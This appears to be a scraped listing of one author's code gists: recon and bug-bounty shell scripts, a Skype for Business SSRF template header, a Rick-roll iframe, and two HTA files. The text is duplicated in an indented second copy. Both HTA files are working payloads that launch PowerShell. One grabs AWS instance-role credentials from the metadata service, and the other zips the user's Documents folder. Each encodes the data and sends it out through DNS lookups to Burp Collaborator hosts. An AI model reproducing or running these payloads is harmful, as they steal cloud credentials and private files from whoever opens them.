hateshape

## otpme.sh
#!/bin/bash
################################## INFOS ##################################
# Depends on exported otpauth-migration://offline from Google authenticator
# dependencies: expect oathtool otp_export python3-protobuf python3-urllib3 xclip zbarimg
# shellcheck disable=SC1087 disable=SC2128
###########################################################################
addkeys() {
  if [[ -s "$OTPEXPORTTMP" && -n "$OTPEXPORTTMP" ]]; then
    OTPEXPORT=$(zbarimg -q "$OTPEXPORTTMP" | sed 's#QR-Code:##g')
  elif [[ ! -s "$OTPEXPORTTMP" && -n "$OTPEXPORTTMP" ]]; then

## skype-blind-ssrf
id: skype-blind-ssrf

info:
  name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
  author: hateshape
  severity: high
  description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
  reference:
    - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
  metadata:

## relations.sh
#!/bin/bash
PROGS='\033[01;91m'
TEXTS='\033[01;90m'
RESET='\033[00m'
DASHES="------------------------------------"

# Dependencies: htmlq, html-to-csv
# cargo install htmlq
# pip install html-to-csv

## he.sh
#!/bin/bash
# Dependencies: anew,linux,html2csv
pcsv() {
  column -t -s"," | less -F -S -X -K
}
bgphenet() {
  IPCIDRNAME=$(echo $TARGET | sed 's#/#-#g')
  CMDBASE="google-chrome --dump-dom --disable-gpu --headless --run-all-compositor-stages-before-draw --virtual-time-budget=10000"
  YOJUSTRUNBGPS=$CMDBASE
  YOJUSTRUNBGPS+=" $BGPHENETURL/net/$TARGET#_dns"

## ipv4info.sh
#!/bin/bash
# Domain Search Broke Currently on ipv4info.com
# ASN Search I Don't Care Enough to Do it
# ./ipv4info.sh COMPANYNAME
# ./ipv4info.sh IPADDRESS

ipv4info-compname(){
URL="$(echo 'http://ipv4info.com/?act=check&ip='${COMPANYNAME} )"
curl -sLk $URL -o $COMPANYNAME.html
html2csv $COMPANYNAME.html > $COMPANYNAME.csv

## ffufsv2.sh
#!/bin/bash
# Run ffuf with whatever command line flags before running this, but then this will make it pretty after
# ./ffufs.sh <previous ffuf results>
# ./ffufs.sh bla.csv

# Pretty Colors
RESET='\033[00m'
RED='\033[01;31m'
GREEN='\033[01;32m'
BLUE='\033[01;34m'

## c99.sh
#!/bin/bash
curl -s -k -o $1.json "https://api.c99.nl/subdomainfinder?key=XXXXX-XXXXX-XXXXX-XXXXX&domain=$1&json"
jq '.subdomains|.[].subdomain' $1.json > subdomain
jq '.subdomains|.[].ip' $1.json > ips
jq '.subdomains|.[].cloudflare' $1.json > cloudflare

subdomains_len=$(wc -l subdomain | awk '{print $1}')
ips_len=$(wc -l ips | awk '{print $1}')
cloudflare_len=$(wc -l cloudflare | awk '{print $1}')

## rick.html
<iframe width="100%" height="100%" src="https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1&allow=autoplay" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

## DNS-Exfiltration-AWS.hta
<html><head><meta name=ProgId content=htafile></head>
<hta:application id=x><script>
try { if (x.commandLine != ""){
new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
meta-data/iam/security-credentials/aws-ec2-role;$b=($a|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
 }
}
catch(ex){ alert('Error');}

## DNS-Exfiltration.hta
<html><head><meta name=ProgId content=htafile></head>
<hta:application id=x><script>
try { if (x.commandLine != ""){
new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a00=(Resolve-Path ~);Compress-Archive -Path $a00/Documents -DestinationPath 'a.zip';$c=[Convert]::ToBase64String([IO.File]::ReadAllBytes('a.zip'));$r1=$c | Foreach-Object {$_.Replace('=', 'EQ')};$r2=$r1 | Foreach-Object {$_.Replace('/', 'SLASH')};$r3=$r2 | Foreach-Object {$_.Replace('+', 'PLUS')};$e=($r3 -split '(.{50})'| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.ToString()+'.u61vj1t81tyg2t3az0hb4ujvum0co1.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
 }
}
catch(ex){ alert('Error');}
</script>
</html>
	#!/bin/bash
	################################## INFOS ##################################
	# Depends on exported otpauth-migration://offline from Google authenticator
	# dependencies: expect oathtool otp_export python3-protobuf python3-urllib3 xclip zbarimg
	# shellcheck disable=SC1087 disable=SC2128
	###########################################################################
	addkeys() {
	if [[ -s "$OTPEXPORTTMP" && -n "$OTPEXPORTTMP" ]]; then
	OTPEXPORT=$(zbarimg -q "$OTPEXPORTTMP" \| sed 's#QR-Code:##g')
	elif [[ ! -s "$OTPEXPORTTMP" && -n "$OTPEXPORTTMP" ]]; then
	id: skype-blind-ssrf

	info:
	name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
	author: hateshape
	severity: high
	description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
	reference:
	- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
	metadata:
	#!/bin/bash
	PROGS='\033[01;91m'
	TEXTS='\033[01;90m'
	RESET='\033[00m'
	DASHES="------------------------------------"

	# Dependencies: htmlq, html-to-csv
	# cargo install htmlq
	# pip install html-to-csv
	#!/bin/bash
	# Dependencies: anew,linux,html2csv
	pcsv() {
	column -t -s"," \| less -F -S -X -K
	}
	bgphenet() {
	IPCIDRNAME=$(echo $TARGET \| sed 's#/#-#g')
	CMDBASE="google-chrome --dump-dom --disable-gpu --headless --run-all-compositor-stages-before-draw --virtual-time-budget=10000"
	YOJUSTRUNBGPS=$CMDBASE
	YOJUSTRUNBGPS+=" $BGPHENETURL/net/$TARGET#_dns"
	#!/bin/bash
	# Domain Search Broke Currently on ipv4info.com
	# ASN Search I Don't Care Enough to Do it
	# ./ipv4info.sh COMPANYNAME
	# ./ipv4info.sh IPADDRESS

	ipv4info-compname(){
	URL="$(echo 'http://ipv4info.com/?act=check&ip='${COMPANYNAME} )"
	curl -sLk $URL -o $COMPANYNAME.html
	html2csv $COMPANYNAME.html > $COMPANYNAME.csv
	#!/bin/bash
	# Run ffuf with whatever command line flags before running this, but then this will make it pretty after
	# ./ffufs.sh <previous ffuf results>
	# ./ffufs.sh bla.csv

	# Pretty Colors
	RESET='\033[00m'
	RED='\033[01;31m'
	GREEN='\033[01;32m'
	BLUE='\033[01;34m'
	#!/bin/bash
	curl -s -k -o $1.json "https://api.c99.nl/subdomainfinder?key=XXXXX-XXXXX-XXXXX-XXXXX&domain=$1&json"
	jq '.subdomains\|.[].subdomain' $1.json > subdomain
	jq '.subdomains\|.[].ip' $1.json > ips
	jq '.subdomains\|.[].cloudflare' $1.json > cloudflare

	subdomains_len=$(wc -l subdomain \| awk '{print $1}')
	ips_len=$(wc -l ips \| awk '{print $1}')
	cloudflare_len=$(wc -l cloudflare \| awk '{print $1}')
	<html><head><meta name=ProgId content=htafile></head>
	<hta:application id=x><script>
	try { if (x.commandLine != ""){
	new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
	meta-data/iam/security-credentials/aws-ec2-role;$b=($a\|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
	em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'\| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
	String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
	}
	}
	catch(ex){ alert('Error');}